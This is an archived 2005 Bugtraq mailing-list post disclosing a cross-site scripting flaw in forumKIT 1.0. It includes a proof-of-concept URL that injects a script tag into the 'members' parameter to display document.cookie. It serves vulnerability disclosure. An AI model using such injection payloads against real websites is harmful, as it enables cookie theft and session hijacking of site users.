[prev in list] [next in list] [prev in thread] [next in thread]
List: bugtraq
Subject: XSS Vulnerability in ForumKIT
From: tom cruise <the.n3t () gmail ! com>
Date: 2005-01-13 11:17:00
Message-ID: 20050113111700.12211.qmail () www ! securityfocus ! com
[Download RAW message or body]
Vulnerable System :
forumKIT 1.0
Description :
an XSS is founded in the variable members that have the value 'true'
you can exchange it with XSS Code .
exploit :
http://forum.target.com/f.aspx?members="><script>alert(document.cookie);</script>
this exploit is discovered by : neO
e-mail : al_modamer@hotmail.com
[prev in list] [next in list] [prev in thread] [next in thread]
Configure |
About |
News |
Add a list |
Sponsored by KoreLogic